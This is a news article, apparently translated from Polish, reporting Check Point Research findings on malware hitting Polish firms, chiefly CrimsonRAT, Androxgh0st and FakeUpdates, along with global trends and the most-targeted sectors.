New Malware, CrimsonRAT, Targets Polish Businesses: Infects Over 6% of Enterprises

SECURITYNew Malware, CrimsonRAT, Targets Polish Businesses: Infects Over 6% of Enterprises
  • CrimsonRAT, distributed through spam, is trying to infect over 6 percent of Polish enterprises, making it the most frequently encountered malicious software in Poland in recent weeks. It can control infected computers and perform various malicious tasks.
  • The two other threats most frequently detected in Poland are Androxgh0st botnet and FakeUpdates downloader, which have been among the most popular malware in recent months.
  • Globally, FakeUpdates still dominates, affecting 7 percent of organizations worldwide.

The new software – CrimsonRAT, distributed through spam, is trying to infect over 6 percent of Polish enterprises, making it the most frequently encountered malicious software in Poland in recent weeks, warn analysts from Check Point Research. Globally, FakeUpdates still dominates, affecting 7 percent of organizations worldwide.

– CrimsonRAT is a Remote Access Tool (RAT), using the Java programming language and concealing itself behind legitimate files. It spreads via spam email campaigns that contain malicious Microsoft Office documents – explains Wojciech Głażewski, country manager of Check Point in Poland.

CrimsonRAT can control infected computers and perform various malicious tasks. Interestingly, this tool is not among the most popular ones worldwide and is detected in less than 0.5 percent of corporate networks. However, in July, it was the most popular malicious software targeting Polish companies and internet users.

The other two threats most often detected in Poland are Androxgh0st botnet and FakeUpdates downloader, which have been at the forefront of the most popular malware in recent months. The former attacks Windows, Mac, and Linux. The tool exploits many vulnerabilities, particularly attacking PHPUnit, Laravel Framework, and Apache Web Server, and then steals confidential information, such as Twilio account information, SMTP credentials, AWS keys, etc. In July, Androxgh0st affected nearly 4 percent of all Polish networks. The third most common, FakeUpdates, which infected nearly 3 percent of enterprise networks, is a JavaScript downloader that saves payloads on the disk before launching them, infecting machines with software such as GootLoader, Dridex, NetSupport, DoppelPaymer, and AZORult.

Globally, a series of new tactics using FakeUpdates are alarming, which is currently the most frequently attacking malicious software worldwide. It turns out that more and more unsuspecting users visiting infected websites are encountering fake requests to update their browser, which in the final phase of infection leads to the installation of remote access trojans, such as AsyncRAT. Experts also point out the use by cybercriminals of the BOINC platform, intended for data processing, to gain remote control over infected systems.

Check Point Research analysts confirm that the most frequently attacked sectors of the economy are currently education and research, the government-military sector, and communication. The most frequently exploited vulnerability is Command Injection Over HTTP (CVE-2021-43936, CVE-2022-24086).

Source: https://managerplus.pl/cyberprzestepcy-celuja-w-polskie-firmy-crimsonrat-nowym-zagrozeniem-36569

Exit mobile version